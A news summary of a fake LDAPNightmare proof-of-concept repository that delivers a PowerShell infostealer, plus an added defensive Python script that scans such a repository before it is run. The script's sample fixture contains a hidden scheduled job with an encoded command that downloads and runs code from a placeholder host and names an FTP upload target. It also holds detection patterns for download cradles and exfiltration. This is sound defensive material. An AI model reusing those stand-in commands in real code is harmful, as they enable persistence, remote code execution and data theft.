
Bogus LDAPNightmare POC Deploys Infostealer Via Malicious GitHub Repo


BleepingComputer reports that hackers have used a malicious GitHub repository to distribute an info-stealer disguised as a proof-of-concept (PoC) exploit for LDAPNightmare (CVE-2024-49113), the recently patched denial-of-service flaw in the Windows Lightweight Directory Access Protocol (LDAP) service.

Researchers at Trend Micro said that running the bogus exploit drops a PowerShell script into the target system's %Temp% folder and executes it; that script registers a scheduled job which runs a further script, and that later stage ultimately retrieves the info-stealing malware.

The infostealer collects computer details, lists of running processes and directories, network adapter details and IP addresses, and exfiltrates them to an external FTP server, the researchers said. They recommend that anyone downloading PoC code validate the repository more carefully, review the code before running it, upload any binaries it ships to VirusTotal, and avoid running obfuscated code.
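As an added example (not code from the article or from Trend Micro), the following Python script applies those recommendations to a checked-out PoC repository before anything in it is run: it hashes every file so binaries can be looked up on VirusTotal, flags a compiled binary offered as the "exploit", and scans scripts for the traits described above, namely a drop to %Temp%, scheduled-job registration, FTP use, and a command hidden behind PowerShell's -EncodedCommand, which it decodes and re-scans. The repository layout, file names and URLs it creates are constructed for the example and are not indicators from the real campaign.

```python
"""Pre-execution triage of a downloaded proof-of-concept repository.

Added example: walks a checked-out repo, hashes every file (so binaries can
be looked up on VirusTotal by SHA-256) and flags traits like those described
in the Trend Micro write-up: a compiled "exploit" with no source, and scripts
that drop to %Temp%, register a scheduled job, talk FTP, or hide their real
command behind -EncodedCommand. The sample repo built below is constructed.
"""
import base64
import binascii
import hashlib
import re
import tempfile
from pathlib import Path

SCRIPT_EXTS = {".ps1", ".psm1", ".bat", ".cmd", ".vbs", ".js", ".py", ".sh"}

# Indicators a reviewer wants to see in plaintext before running anything.
PATTERNS = {
    "scheduled_job": re.compile(
        r"Register-ScheduledJob|Register-ScheduledTask|schtasks(?:\.exe)?\s+/create", re.I),
    "temp_drop": re.compile(r"%Temp%|\$env:TEMP|\\AppData\\Local\\Temp", re.I),
    "ftp_exfil": re.compile(r"\bftp://|WebRequestMethods\.Ftp", re.I),
    "download_cradle": re.compile(
        r"Invoke-WebRequest|DownloadString|Invoke-Expression|\biex\b", re.I),
}
# PowerShell accepts -e / -ec / -enc / -EncodedCommand followed by UTF-16LE base64.
ENCODED_CMD = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{40,})", re.I)


def decode_encoded_commands(text):
    """Return the plaintext of every -EncodedCommand blob found in text."""
    decoded = []
    for blob in ENCODED_CMD.findall(text):
        try:
            raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
        except (binascii.Error, ValueError):
            continue  # not valid base64 after all; leave it for manual review
        decoded.append(raw.decode("utf-16-le", errors="replace"))
    return decoded


def triage_file(path):
    """Hash one file and collect the indicator names it triggers."""
    data = path.read_bytes()
    result = {"path": str(path), "sha256": hashlib.sha256(data).hexdigest(), "flags": []}
    if data[:2] == b"MZ":
        # A compiled binary offered as the exploit: nothing to review, hash it for VirusTotal.
        result["flags"].append("pe_binary")
        return result
    if path.suffix.lower() not in SCRIPT_EXTS:
        return result
    text = data.decode("utf-8", errors="replace")
    for name, pat in PATTERNS.items():
        if pat.search(text):
            result["flags"].append(name)
    payloads = decode_encoded_commands(text)
    if payloads:
        result["flags"].append("encoded_command")
        # Re-scan the decoded command: that is where the real behaviour hides.
        for plain in payloads:
            for name, pat in PATTERNS.items():
                if pat.search(plain):
                    result["flags"].append("decoded:" + name)
    return result


def triage_repo(root):
    """Return findings for every file under root, flagged files first."""
    root = Path(root)
    findings = []
    for p in sorted(root.rglob("*")):
        if p.is_file():
            f = triage_file(p)
            f["path"] = str(p.relative_to(root))
            findings.append(f)
    return sorted(findings, key=lambda f: (not f["flags"], f["path"]))


def build_sample_repo(root):
    """Constructed stand-in for a bogus PoC repo (hypothetical names and URLs)."""
    root = Path(root)
    (root / "README.md").write_text("# PoC\nRun poc.exe against the target DC.\n")
    (root / "poc.exe").write_bytes(b"MZ" + b"\x00" * 62 + b"not a real PE body")
    stage2 = ("Invoke-WebRequest -Uri https://example.invalid/s2.ps1 | Invoke-Expression; "
              "$ftp = 'ftp://example.invalid/up'")
    blob = base64.b64encode(stage2.encode("utf-16-le")).decode()
    (root / "stage.ps1").write_text(
        "$d = Join-Path $env:TEMP 'upd.ps1'\n"
        "Register-ScheduledJob -Name Upd -ScriptBlock { powershell -nop -w hidden "
        "-EncodedCommand " + blob + " }\n")
    (root / "exploit.py").write_text("import ldap3  # harmless placeholder\n")
    return root


def run_sample():
    """Build the constructed repo in a temp dir and return findings keyed by path."""
    with tempfile.TemporaryDirectory() as tmp:
        return {f["path"]: f for f in triage_repo(build_sample_repo(tmp))}


if __name__ == "__main__":
    for path, f in run_sample().items():
        print(f["sha256"][:16], path, ",".join(f["flags"]) or "-")
```

The SHA-256 column is what you paste into VirusTotal; the decoded flags are the reason a hidden-window scheduled job that fetches a second stage should end the review, not prompt a closer look at the "exploit".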
